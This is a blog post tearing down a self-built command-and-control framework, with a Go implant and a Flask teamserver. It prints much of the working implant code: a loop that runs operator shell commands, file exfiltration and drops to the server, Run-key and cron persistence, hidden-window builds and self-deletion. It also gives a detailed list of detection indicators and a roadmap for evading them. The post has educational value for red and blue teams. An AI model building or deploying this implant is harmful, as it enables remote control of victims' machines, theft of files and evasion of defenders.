← Back to Home

C2 Development from Scratch: Phase 1 Teardown

March 22, 2026 View Source ↗
offensive-securityred-teamc2gopythonmalware-development

A teardown of a Phase 1 Command and Control framework, its architecture, its engineering decisions, and every way a Blue Team would catch it.

1. Introduction

This is a teardown of a C2 framework I built from scratch to understand, at the lowest level, how C2 communication actually works. I didn’t use Cobalt Strike, Sliver, or any existing framework. Just a Go agent, a Python Flask server, and every mistake you can make on your first build.

This is an Alpha build. It is not OPSEC-safe. It was never meant to be. This is a Phase 1 prototype, a learning tool designed to answer one question: What does a C2 actually do under the hood, and what engineering problems do you hit when you try to build one?

Every architectural decision I made here has a corresponding detection opportunity, and by the end of this post, I’ll have named them all. If you’re on a red team, you’ll learn what not to build. If you’re on a blue team, you’ll learn where to look.

The full stack:

  • Agent (Payload): Written in Go, cross-compiled, statically linked, and no external dependencies.
  • Server (Teamserver): Python Flask with SQLite, REST API, task queue, and a dynamic payload builder.
  • Dashboard (Operator UI): Single-page HTML/JS app for real-time agent management.

2. Phase 1 Architecture

The C2 project uses a pull-based HTTP polling model. The agent doesn’t maintain a persistent connection. Instead, it wakes up on a fixed interval, calls home to ask “do you have anything for me?”, executes whatever it receives, and reports back. This is the simplest C2 communication pattern, and the most detectable, but we’ll get to that.

2.1 The Check-In Loop

The entire agent lifecycle lives inside a single for loop in main.go. Each iteration: the agent POSTs its identity to the server, receives a list of pending tasks, dispatches them, and sleeps.

// agent/main.go - The core check-in loop

func main() {
    InitConfig()

    hostname, _ := os.Hostname()
    agentOS := runtime.GOOS

    for {
        // 1. Check in with the server
        tasks, err := checkIn(hostname, agentOS)
        if err != nil {
            fmt.Printf("[!] Check-in failed: %v\n", err)
            time.Sleep(CheckInInterval)
            continue
        }

        // 2. Execute each pending task
        for _, task := range tasks {
            // Self-destruct: handle synchronously, never returns
            if task.Command == "__selfdestruct__" {
                _ = sendResult(task.ID, "Self-destruct acknowledged. Agent wiping…")
                funcs.SelfDestruct()
            }

            // cd commands: synchronous (affects working dir for subsequent commands)
            if funcs.IsCdCommand(task.Command) {
                output, cdErr := funcs.ExecuteCommand(task.Command)
                if cdErr != nil {
                    output = fmt.Sprintf("Error: %v", cdErr)
                }
                _ = sendResult(task.ID, output)
                continue
            }

            // Exfiltration: get <path>
            if strings.HasPrefix(task.Command, "get ") {
                go func(t Task) {
                    filePath := strings.TrimSpace(strings.TrimPrefix(t.Command, "get "))
                    output, err := funcs.UploadFile(ServerURL, AgentID, filePath)
                    if err != nil {
                        output = fmt.Sprintf("Exfil error: %v", err)
                    }
                    _ = sendResult(t.ID, output)
                }(task)
                continue
            }

            // File drop: download <file_id> <save_path>
            if strings.HasPrefix(task.Command, "download ") {
                go func(t Task) {
                    args := strings.TrimSpace(strings.TrimPrefix(t.Command, "download "))
                    parts := strings.SplitN(args, " ", 2)
                    if len(parts) != 2 {
                        _ = sendResult(t.ID, "Usage: download <file_id> <save_path>")
                        return
                    }
                    output, err := funcs.DownloadFile(ServerURL, parts[0], strings.TrimSpace(parts[1]))
                    if err != nil {
                        output = fmt.Sprintf("Download error: %v", err)
                    }
                    _ = sendResult(t.ID, output)
                }(task)
                continue
            }

            // All other commands: run in a goroutine (non-blocking)
            go func(t Task) {
                output, execErr := funcs.ExecuteCommand(t.Command)
                if execErr != nil && output == "" {
                    output = fmt.Sprintf("Error: %v", execErr)
                }
                _ = sendResult(t.ID, output)
            }(task)
        }

        time.Sleep(CheckInInterval)
    }
}

This is a command parser. The loop checks each task against a chain of built-in commands before falling through to the generic shell execution path. A few things worth pointing out:

  • cd commands are synchronous. They block the task loop because they mutate the agent’s working directory state, and subsequent commands depend on the result. Everything else fires off in a goroutine and runs concurrently.
  • get and download are intercepted before the shell. get routes to the file exfiltration handler (UploadFile), and download routes to the file drop handler (DownloadFile). If these hit the generic path, cmd.exe /C get somefile.txt would just fail or do something unexpected. They need dedicated routing.
  • Self-destruct is a hard stop. When __selfdestruct__ arrives, the agent acknowledges, wipes itself, and never returns. It doesn’t get a goroutine or a continue, it just calls os.Exit(0) internally.

The check-in itself is a simple JSON POST:

// agent/main.go - HTTP check-in

func checkIn(hostname, agentOS string) ([]Task, error) {
    payload := CheckInPayload{
        AgentID:  AgentID,
        Hostname: hostname,
        OS:       agentOS,
    }

    body, _ := json.Marshal(payload)

    resp, err := http.Post(
        ServerURL+"/api/checkin",
        "application/json",
        bytes.NewBuffer(body),
    )
    if err != nil {
        return nil, fmt.Errorf("request error: %w", err)
    }
    defer resp.Body.Close()

    respBody, _ := io.ReadAll(resp.Body)

    var result CheckInResponse
    json.Unmarshal(respBody, &result)

    return result.Tasks, nil
}

The agent sends its UUID, hostname, and OS. The server responds with a JSON array of tasks. That’s the entire protocol. There’s no authentication, no encryption, and no handshake. We’ll come back to why that’s a problem.

2.2 Server-Side: Task Queue

On the server side, the /api/checkin endpoint does three things: register or update the agent, query for pending tasks, and mark them as sent.

# server/app.py - Check-in endpoint

@app.route("/api/checkin", methods=["POST"])
def checkin():
    data = request.get_json()
    agent_id = data["agent_id"]
    hostname = data.get("hostname", "unknown")
    agent_os = data.get("os", "unknown")
    ip = request.remote_addr

    conn = get_db_connection()

    existing = conn.execute(
        "SELECT id FROM agents WHERE id = ?", (agent_id,)
    ).fetchone()

    if existing:
        conn.execute(
            "UPDATE agents SET hostname = ?, ip = ?, os = ?, last_seen = ? WHERE id = ?",
            (hostname, ip, agent_os, datetime.now(timezone.utc).isoformat(), agent_id),
        )
    else:
        conn.execute(
            "INSERT INTO agents (id, hostname, ip, os, last_seen) VALUES (?, ?, ?, ?, ?)",
            (agent_id, hostname, ip, agent_os, datetime.now(timezone.utc).isoformat()),
        )

    conn.commit()

    # Fetch pending tasks and mark as sent
    tasks = conn.execute(
        "SELECT id, command FROM tasks WHERE agent_id = ? AND status = 'pending'",
        (agent_id,),
    ).fetchall()

    for task in tasks:
        conn.execute("UPDATE tasks SET status = 'sent' WHERE id = ?", (task["id"],))

    conn.commit()
    conn.close()

    return jsonify({
        "status": "ok",
        "tasks": [{"id": t["id"], "command": t["command"]} for t in tasks],
    })

The task lifecycle is a simple: pendingsentcomplete. When the operator queues a command through the dashboard, it enters as pending. The next time the agent checks in, it gets bundled into the response and flipped to sent. When the agent POSTs back the output, it becomes complete.

Simple polling queue. It works. It also means the server has to be up and reachable at all times since there’s nothing built in for store-and-forward, retry logic, or fallback channels.

2.3 Dynamic Payload Compilation

One of the more interesting engineering decisions here is that the server doesn’t ship pre-built binaries. It compiles the agent on demand with operator-specified configuration baked directly into the source code. The /api/build endpoint generates custom Go source files, then cross-compiles them:

# server/app.py - Dynamic agent compilation

def _generate_config_go(server_url, interval, persistence):
    """Generate a config.go file with the given settings."""
    return f'''package main

import (
    "crypto/rand"
    "fmt"
    "os"
    "runtime"
    "time"
)

var (
    ServerURL       = "{server_url}"
    CheckInInterval = {interval} * time.Second
    AgentID         string
    EnablePersist   = {str(persistence).lower()}
)
// ... UUID generation and init banner ...
'''

The build endpoint copies the agent source tree to a temp directory, overwrites config.go and main.go with the generated versions, and invokes the Go compiler:

# server/app.py - Cross-compilation invocation

env = os.environ.copy()
env["GOOS"] = target_os      # "windows", "linux", "darwin"
env["GOARCH"] = arch          # "amd64", "arm64", "386"
env["CGO_ENABLED"] = "0"     # Static linking, no C dependencies

ldflags = "-s -w"            # Strip debug symbols and DWARF info
if target_os == "windows":
    ldflags += " -H=windowsgui"  # Hide console window on Windows

result = subprocess.run(
    ["go", "build", "-ldflags", ldflags, "-o", output_path, "."],
    cwd=tmp_agent,
    env=env,
    capture_output=True,
    text=True,
    timeout=120,
)

Why this matters: The callback URL, check-in interval, and persistence flag are compiled directly into the binary as Go string/int literals. There’s nothing to find on disk, nothing to intercept from command-line arguments, and nothing to pull from environment variables. The trade-off is that each unique configuration requires a fresh compilation, but that also means each deployed agent can have a unique callback address and interval, which makes blanket network signatures harder in theory.

The -s -w ldflags strip the symbol table and DWARF debug information, which reduces binary size and removes function names that would make static analysis easy. The -H=windowsgui flag on Windows builds suppresses the console window. Without it, the agent would pop a visible cmd.exe window when executed.

2.4 Agent Identity

Each agent generates a cryptographically random UUID v4 on first launch:

// agent/config.go - UUID generation

func generateUUID() string {
    b := make([]byte, 16)
    rand.Read(b)
    b[6] = (b[6] & 0x0f) | 0x40 // version 4
    b[8] = (b[8] & 0x3f) | 0x80 // variant 10
    return fmt.Sprintf("%08x-%04x-%04x-%04x-%012x",
        b[0:4], b[4:6], b[6:8], b[8:10], b[10:16])
}

This UUID is the agent’s sole identity, used in every check-in, every result submission, every file upload. It’s generated from crypto/rand (not math/rand), so it’s unpredictable. But it’s also ephemeral: if the agent process restarts, it generates a new UUID and registers as a completely new agent. There’s no persistence of identity across reboots, which is both a limitation and a design choice. A compromised agent ID can’t be reused by a defender to inject false commands.


3. Engineering the cd Command

This is the first real engineering problem you hit when building a C2 agent, and it’s not obvious until you actually run into it.

The Problem

When you execute a shell command through Go’s exec.Command, each invocation spawns a new child process. That process inherits the working directory you set on cmd.Dir, runs the command, and exits. The process, and all its state, is gone.

So if you run cd C:\Users\target\Desktop in one command and then dir in the next, the dir runs in whatever directory the agent binary lives in, not the Desktop. The cd executed in the first subprocess, changed that subprocess’s working directory, and then that subprocess died. The agent process never moved.

This comes down to how operating systems handle process state. cd is a shell built-in, not an external program. It mutates the calling shell’s state. When you spawn cmd.exe /C cd somewhere, you’re mutating the state of a temporary cmd.exe that immediately exits.

The Solution

The agent intercepts cd commands before they reach the shell and handles them entirely in-process by tracking a CurrentDir variable:

// agent/funcs/shell.go - The cd interception and state tracking

// CurrentDir tracks the working directory across commands.
var CurrentDir string

func init() {
    dir, err := os.Getwd()
    if err != nil {
        dir, _ = os.UserHomeDir()
    }
    CurrentDir = dir
}

// IsCdCommand checks if the given command is a cd/directory change command.
func IsCdCommand(command string) bool {
    trimmed := strings.TrimSpace(command)
    return trimmed == "cd" ||
        strings.HasPrefix(trimmed, "cd ") ||
        strings.HasPrefix(trimmed, "cd\t") ||
        strings.HasPrefix(trimmed, "cd\\") ||
        strings.HasPrefix(trimmed, "cd/")
}

// handleCd processes a cd command and updates CurrentDir.
func handleCd(command string) (string, error) {
    trimmed := strings.TrimSpace(command)
    args := strings.TrimPrefix(trimmed, "cd")
    args = strings.TrimSpace(args)

    // Handle Windows "cd /d" flag
    if runtime.GOOS == "windows" {
        args = strings.TrimPrefix(args, "/d")
        args = strings.TrimPrefix(args, "/D")
        args = strings.TrimSpace(args)
    }

    // cd with no args - show current dir
    if args == "" {
        return CurrentDir, nil
    }

    // Handle ~ for home directory
    if args == "~" || strings.HasPrefix(args, "~/") || strings.HasPrefix(args, "~\\") {
        home, err := os.UserHomeDir()
        if err != nil {
            return "", fmt.Errorf("cd: cannot resolve home directory: %v", err)
        }
        args = home + args[1:]
    }

    // Resolve relative vs absolute
    var newDir string
    if filepath.IsAbs(args) {
        newDir = args
    } else {
        newDir = filepath.Join(CurrentDir, args)
    }

    newDir = filepath.Clean(newDir)

    // Verify the path exists and is a directory
    info, err := os.Stat(newDir)
    if err != nil {
        return "", fmt.Errorf("cd: %s: no such directory", args)
    }
    if !info.IsDir() {
        return "", fmt.Errorf("cd: %s: not a directory", args)
    }

    CurrentDir = newDir
    return CurrentDir, nil
}

Then every subsequent command is spawned with cmd.Dir set to CurrentDir:

// agent/funcs/shell.go - Command execution with tracked directory

func ExecuteCommand(command string) (string, error) {
    if IsCdCommand(command) {
        newDir, err := handleCd(command)
        if err != nil {
            return err.Error(), err
        }
        return newDir, nil
    }

    ctx, cancel := context.WithTimeout(context.Background(), CommandTimeout)
    defer cancel()

    var cmd *exec.Cmd
    switch runtime.GOOS {
    case "windows":
        cmd = exec.CommandContext(ctx, "cmd.exe", "/C", command)
    default:
        cmd = exec.CommandContext(ctx, "/bin/sh", "-c", command)
    }

    // This is the key line - every command inherits the tracked state
    cmd.Dir = CurrentDir

    output, err := cmd.CombinedOutput()

    if ctx.Err() == context.DeadlineExceeded {
        return string(output) + fmt.Sprintf(
            "\n[TIMEOUT] Command killed after %s", CommandTimeout,
        ), fmt.Errorf("command timed out after %s", CommandTimeout)
    }

    if err != nil {
        return string(output) + "\n" + err.Error(), err
    }

    return string(output), nil
}

The cd command never touches the OS. It’s pure string manipulation and os.Stat validation. The CurrentDir variable is a single global instance that every goroutine reads from, which is why cd is handled synchronously in the main loop (see Section 2.1). If it ran in a goroutine, you’d have a race condition where a subsequent command could read a stale working directory.

That said, this isn’t fully solved. Making cd synchronous only protects the write side. The read side is still unguarded. When a goroutine spawned for a regular command reads CurrentDir to set cmd.Dir, there’s no mutex or lock preventing a cd from writing to that same variable at the exact same time. In practice this hasn’t caused issues because of how Go’s goroutine scheduler works and because tasks within a single check-in batch are dispatched sequentially (the goroutines just execute concurrently). But if you ran go run -race on this, it would flag CurrentDir as a data race immediately. The correct fix is a sync.RWMutex: read-lock in ExecuteCommand, write-lock in handleCd. I haven’t done that yet, and it’s on the list.

You’ll find this same pattern in every C2 agent that supports interactive shell semantics. Cobalt Strike’s Beacon does it. Sliver does it. Metasploit’s Meterpreter does it. The alternative, keeping a persistent shell process alive, introduces its own set of problems (handle management, pipe buffering, zombie processes), which is why the stateless-subprocess-with-tracked-directory approach is the standard.


4. File Operations and Self-Deletion

The C2 project supports bidirectional file transfer: exfiltration (agent → server via the get command) and file drops (server → agent via the download command).

4.1 Exfiltration via Multipart Upload

When the operator runs get C:\Users\target\Documents\secrets.xlsx, the agent reads the file from disk and POSTs it to the server as multipart/form-data:

// agent/funcs/transfer.go - File exfiltration

func UploadFile(serverURL, agentID, filePath string) (string, error) {
    // Resolve relative paths against the tracked working directory
    if !filepath.IsAbs(filePath) {
        filePath = filepath.Join(CurrentDir, filePath)
    }

    file, err := os.Open(filePath)
    if err != nil {
        return "", fmt.Errorf("cannot open file: %v", err)
    }
    defer file.Close()

    fi, _ := file.Stat()
    if fi.IsDir() {
        return "", fmt.Errorf("cannot upload a directory")
    }

    // Build multipart form body
    var body bytes.Buffer
    writer := multipart.NewWriter(&body)

    part, _ := writer.CreateFormFile("file", filepath.Base(filePath))
    io.Copy(part, file)

    writer.WriteField("agent_id", agentID)
    writer.WriteField("original_path", filePath)
    writer.Close()

    req, _ := http.NewRequest("POST", serverURL+"/api/upload", &body)
    req.Header.Set("Content-Type", writer.FormDataContentType())

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return "", fmt.Errorf("upload failed: %v", err)
    }
    defer resp.Body.Close()

    return fmt.Sprintf("Uploaded: %s (%d bytes)", filepath.Base(filePath), fi.Size()), nil
}

Why multipart/form-data instead of JSON with base64? Base64 encoding inflates binary data by ~33%. A 10MB file becomes 13.3MB in a JSON payload. Multipart sends raw bytes with boundary delimiters, keeping the transfer size close to the actual file size. For large exfiltration jobs (disk images, database dumps, memory captures), this matters. It also means the server can use standard request.files handling in Flask instead of manually decoding base64 blobs.

The server-side handler saves the file with a timestamp prefix to prevent overwrites and records metadata in the loot table:

# server/app.py - Receiving exfiltrated files

@app.route("/api/upload", methods=["POST"])
def receive_upload():
    file = request.files["file"]
    agent_id = request.form.get("agent_id", "unknown")
    original_path = request.form.get("original_path", "")

    filename = secure_filename(file.filename) if file.filename else "unnamed"
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    save_name = f"{timestamp}_{filename}"
    save_path = os.path.join(LOOT_DIR, save_name)

    file.save(save_path)
    file_size = os.path.getsize(save_path)

    conn = get_db_connection()
    conn.execute(
        "INSERT INTO loot (agent_id, filename, original_path, file_path, file_size) "
        "VALUES (?, ?, ?, ?, ?)",
        (agent_id, filename, original_path, save_path, file_size),
    )
    conn.commit()
    conn.close()

    return jsonify({"status": "ok", "filename": filename, "size": file_size})

4.2 File Drops (Server → Agent)

The reverse direction works through a staging mechanism. The operator uploads a file to the server through the dashboard, which stores it in a staged/ directory and assigns it a numeric ID. The operator then sends a download <file_id> <save_path> command to the agent:

// agent/funcs/transfer.go - File download from C2

func DownloadFile(serverURL, fileID, savePath string) (string, error) {
    if !filepath.IsAbs(savePath) {
        savePath = filepath.Join(CurrentDir, savePath)
    }

    resp, err := http.Get(serverURL + "/api/files/" + fileID)
    if err != nil {
        return "", fmt.Errorf("download request failed: %v", err)
    }
    defer resp.Body.Close()

    // Create parent directories if needed
    os.MkdirAll(filepath.Dir(savePath), 0755)

    out, err := os.Create(savePath)
    if err != nil {
        return "", fmt.Errorf("cannot create file: %v", err)
    }
    defer out.Close()

    n, _ := io.Copy(out, resp.Body)

    return fmt.Sprintf("Saved: %s (%d bytes)", savePath, n), nil
}

This two-phase approach (stage, then command) means the agent only pulls files when explicitly told to. The server never pushes data unsolicited. The agent is always the initiator.

4.3 Self-Destruct and Cleanup

When the operator wants to burn an agent, the server queues a __selfdestruct__ task. On the next check-in, the agent runs a three-stage wipe:

// agent/funcs/selfdestruct.go - Agent self-destruction

func SelfDestruct() {
    // Step 1: Remove persistence
    err := RemovePersistence()
    if err != nil {
        fmt.Printf("[!] Persistence removal failed: %v\n", err)
    }

    // Step 2: Get own executable path
    exePath, err := os.Executable()
    if err != nil {
        os.Exit(0)
    }

    // Step 3: Delete the binary (OS-specific)
    switch runtime.GOOS {
    case "windows":
        // Can't delete a running .exe on Windows.
        // Write a batch script that waits, deletes the exe, then deletes itself.
        batPath := exePath + "_cleanup.bat"
        batContent := fmt.Sprintf(
            "@echo off\r\n:loop\r\ntimeout /t 2 /nobreak >nul\r\n"+
            "del /f /q \"%s\"\r\nif exist \"%s\" goto loop\r\n"+
            "del /f /q \"%s\"\r\n",
            exePath, exePath, batPath,
        )
        os.WriteFile(batPath, []byte(batContent), 0644)

        cmd := exec.Command("cmd.exe", "/C", "start", "/min", batPath)
        cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
        cmd.Start()

    default:
        // On Linux/macOS, you can unlink a running binary
        os.Remove(exePath)
    }

    os.Exit(0)
}

The Windows path here is interesting. You cannot delete a running .exe on Windows because the OS holds a file lock on it. The workaround is a classic technique: write a temporary batch script that loops, trying to delete the exe until the process has exited, then deletes itself. The HideWindow: true syscall attribute keeps the batch script’s console hidden.

On the server side, receiving the self-destruct acknowledgment triggers a cascading database purge. All results, tasks, and the agent record itself are deleted:

# server/app.py - Server-side cleanup after self-destruct

if task and task["command"] == "__selfdestruct__":
    agent_id = task["agent_id"]
    conn.execute("""
        DELETE FROM results WHERE task_id IN (
            SELECT id FROM tasks WHERE agent_id = ?
        )
    """, (agent_id,))
    conn.execute("DELETE FROM tasks WHERE agent_id = ?", (agent_id,))
    conn.execute("DELETE FROM agents WHERE id = ?", (agent_id,))
    conn.commit()

5. The Review: Indicators of Compromise

This is the section that matters. Everything above describes what the C2 project does. This section describes it’s weaknesses. Every design decision in Phase 1 creates a detection surface, and I’m going to walk through each one the way a SOC analyst or threat hunter would find it.

5.1 The Network Anomaly

The IOC: The agent checks in on a fixed time.Sleep() interval, every 10 seconds by default.

// agent/config.go
CheckInInterval = 10 * time.Second

// agent/main.go - End of the check-in loop
time.Sleep(CheckInInterval)

Why this gets caught: Network monitoring tools (Zeek, Suricata, any SIEM with netflow analysis) can easily detect periodic beaconing. If a host makes an HTTP POST to the same endpoint every 10.000 seconds with zero variance, that is not human behavior. It’s an anomaly.

Real C2 frameworks solve this with jitter, a random deviation applied to each sleep interval. Cobalt Strike defaults to 0% jitter but recommends 10-50% in production. If your base interval is 60 seconds with 50% jitter, the actual sleep is randomly chosen between 30-90 seconds on each iteration. The traffic becomes harder to catch with all the noise.

My agent has no jitter. The interval is a compile-time constant with zero variance. Any network analyst looking at connection frequency will see a spike at exactly N seconds. This is the single easiest detection vector in the entire framework.

What Blue Team looks for: Frequency analysis on outbound HTTP connections. Tools like RITA (Real Intelligence Threat Analytics) are purpose-built for this. They ingest Zeek logs and flag hosts with statistically regular connection intervals. A constant connection at 10s with zero standard deviation is an immediate alert.

5.2 Loud Process Execution

The IOC: Every shell command spawns a cmd.exe /C (Windows) or /bin/sh -c (Linux) child process.

// agent/funcs/shell.go
switch runtime.GOOS {
case "windows":
    cmd = exec.CommandContext(ctx, "cmd.exe", "/C", command)
default:
    cmd = exec.CommandContext(ctx, "/bin/sh", "-c", command)
}

Why this gets caught: EDR products like CrowdStrike Falcon, Microsoft Defender for Endpoint, and SentinelOne all monitor process creation trees. When an unsigned binary spawns cmd.exe which then spawns whoami.exe, net.exe, ipconfig.exe, or systeminfo.exe, the process tree looks like:

unknown_binary.exe
  └── cmd.exe /C whoami
        └── whoami.exe

This is textbook command-and-control behavior. EDR heuristics flag process trees where an unknown parent spawns cmd.exe repeatedly with varying arguments, especially when those arguments include common enumeration commands.

The better alternative is direct Windows API calls. Instead of spawning cmd.exe /C dir, you call FindFirstFile/FindNextFile through syscalls. Instead of cmd.exe /C whoami, you call GetUserNameW. Nothing gets created in the process tree because the implant does the work in-process using the same APIs that cmd.exe would call internally.

My agent doesn’t do any of this. Every single command creates a visible process chain.

5.3 Obvious Persistence

The IOC: Persistence is installed by shelling out to reg.exe to write to the Run key.

// agent/funcs/persist.go - Windows persistence

func persistWindows(exePath string) error {
    cmd := exec.Command(
        "reg", "add",
        `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`,
        "/v", PersistName,    // "C2Agent"
        "/t", "REG_SZ",
        "/d", exePath,
        "/f",
    )
    output, err := cmd.CombinedOutput()
    if err != nil {
        return fmt.Errorf("registry add failed: %s - %w", string(output), err)
    }
    return nil
}

This has three compounding problems:

  1. The process tree again. agent.exereg.exe → writes to HKCU\...\Run. EDR specifically monitors reg.exe invocations because attackers use it. Any reg.exe add targeting a Run key generates an alert in most EDR configurations.

  2. The registry key itself. HKCU\Software\Microsoft\Windows\CurrentVersion\Run is the single most monitored persistence location in Windows. It’s Autoruns entry #1. Every EDR, every AV, every sysadmin with Sysinternals knows to look here.

  3. The value name. The persistence entry is literally named C2Agent. This is a hardcoded string constant. Any forensic examiner opening Autoruns or querying the registry will see an entry called “C2Agent” pointing to an unsigned binary. This is the opposite of stealth.

The better approach: Use the Windows API directly (RegSetValueExW through syscall) to avoid spawning reg.exe. Use a less-monitored persistence location (scheduled tasks via COM objects, WMI event subscriptions, DLL search order hijacking). And never name your persistence entry after your tool.

On Linux, the same problem applies. crontab is the first place any incident responder checks:

// agent/funcs/persist.go - Linux persistence
cronLine := fmt.Sprintf("@reboot %s &", exePath)

An @reboot cron entry pointing to an unfamiliar binary in a non-standard path is an easy finding during triage.

5.4 Plaintext Signatures

The IOC: All communication is unencrypted HTTP with default Go User-Agent headers.

// agent/config.go
ServerURL = "http://localhost:5000"

// agent/main.go - Using http.Post (default client)
resp, err := http.Post(
    ServerURL+"/api/checkin",
    "application/json",
    bytes.NewBuffer(body),
)

Multiple detection surfaces here:

  1. No TLS. All traffic (check-ins, command output, exfiltrated files) travels in plaintext. Any network tap, proxy, or IDS can read the full JSON payloads. A Suricata rule matching on "agent_id" in HTTP POST bodies to /api/checkin would catch every single check-in.

  2. Default Go User-Agent. Go’s http.DefaultClient sends a User-Agent header of Go-http-client/1.1 (or /2.0 for HTTP/2). This is a well-known indicator. If a network analyst sees Go-http-client/1.1 making periodic POST requests to /api/checkin with JSON bodies containing agent_id, its over. Legitimate Go HTTP clients in enterprise environments are rare, and the ones that do exist don’t POST to paths named /api/checkin.

  3. Predictable URL paths. The endpoints are /api/checkin, /api/result, /api/upload. These are descriptive, human-readable, and easy to write signatures for. A single Snort/Suricata rule matching any of these paths would catch all traffic from this C2.

  4. Unencrypted JSON payloads. The check-in payload contains agent_id, hostname, and os in cleartext JSON. The result payload contains full command output. If an attacker runs get C:\Users\target\Documents\passwords.xlsx, the exfiltrated file crosses the network as raw multipart form data. A DLP system, or even a basic PCAP review, would capture everything.

What should be done: At minimum, HTTPS with certificate pinning. Better yet, encrypt the payload body with AES-256 before transmission, so even TLS-intercepting proxies (common in enterprise environments with SSL inspection) can’t read the content. Rotate encryption keys per session. Use legitimate cloud service endpoints to blend in with normal traffic. Randomize URL paths. Set a User-Agent string that matches the target environment’s normal traffic.

5.5 Additional OPSEC Failures

Beyond the four major IOCs above, a handful of other detection surfaces exist:

No API Authentication. The server has zero authentication on any endpoint. Anyone who discovers the C2 server can query /api/agents to enumerate all implants, submit tasks to any agent via /api/task, or download all exfiltrated data from /api/loot. A Blue Team that finds the server can hijack it.

# server/app.py - The server runs wide open
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

Also worth noting: debug=True in production. Flask’s debug mode exposes the Werkzeug debugger, which provides an interactive Python shell if an exception occurs. This is a full remote code execution vulnerability on the C2 server itself.

Verbose Console Output. The agent prints operational status to stdout. Check-in results, task execution, errors. If the agent is running in a context where stdout is captured or visible (a terminal session, a redirected log), it will leak it’s own activity:

fmt.Printf("[+] Checked in - %d pending task(s)\n", len(tasks))
fmt.Printf("[>] Executing task #%d: %s\n", task.ID, task.Command)

No Binary Obfuscation. The compiled binary, while stripped of debug symbols (-s -w), still contains all Go string literals in plaintext. Running strings against the binary would reveal "/api/checkin", "agent_id", "C2Agent", and the hardcoded server URL. Any static analysis tool or YARA rule matching these strings would instantly classify the binary.

SQLite Database on Disk. The server stores all operational data (agent records, command history, exfiltration metadata) in a plaintext SQLite file (c2.db). If the C2 server is compromised or seized, the entire operational history is available in a single file with no encryption.

Predictable Build Artifacts. The cleanup batch script for Windows self-destruct is written to <agent_path>_cleanup.bat. An incident responder finding a .bat file named agent_windows_amd64.exe_cleanup.bat containing del /f /q loops has a pretty good idea of what happened.


6. Phase 2 Roadmap

Phase 1 proved the architecture works. Phase 2 is about making it viable. Every IOC identified in the review maps to a planned fix, and they fall into three categories.

On the network side, the biggest wins are jitter and encryption. Replacing the static time.Sleep with a randomized interval (base ± jitterPercent) breaks frequency analysis immediately. Beyond that, the plan is to enforce HTTPS with certificate pinning, encrypt payload bodies with AES-256-GCM so even TLS-intercepting proxies can’t read the content, spoof the User-Agent to match the target environment’s normal traffic, and randomize the API endpoint paths at build time so no two deployments share the same URL structure. Together, these address sections 5.1 and 5.4 almost entirely.

On the host side, the goal is to stop leaving artifacts everywhere. That means replacing cmd.exe /C with direct Windows API syscalls for common operations (FindFirstFile for directory listing, GetUserNameW for identity, RegSetValueExW for registry writes) so nothing shows up in the process tree. Persistence moves away from the Run key to less-monitored locations like COM object hijacking, scheduled tasks via the ITaskService COM interface, or DLL search order hijacking. And where possible, payloads get loaded and executed from memory instead of touching disk. This covers the process tree problem from 5.2, the obvious persistence from 5.3, and the binary obfuscation gap from 5.5.

On the server side, it’s basic hardening that should’ve been there from day one. API key authentication on all endpoints, Flask debug mode disabled, the SQLite database encrypted at rest, check-ins rate-limited, and mutual TLS so the server can verify it’s actually talking to a real agent. This closes the open-server problem from 5.5 and the Werkzeug RCE.


Phase 1 is a skeleton. It does what a C2 needs to do: communicate, execute, persist, exfiltrate, and clean up. But it does all of it loudly. The value isn’t in the tool, it’s in understanding, line by line, why it would get caught, and knowing exactly what to change so it doesn’t.

This framework is built for educational purposes only.